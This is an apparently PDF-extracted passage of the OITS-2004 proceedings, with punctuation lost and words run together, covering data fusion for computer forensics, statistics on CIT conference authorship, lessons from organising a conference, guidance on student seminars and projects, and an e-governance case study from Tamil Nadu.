OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

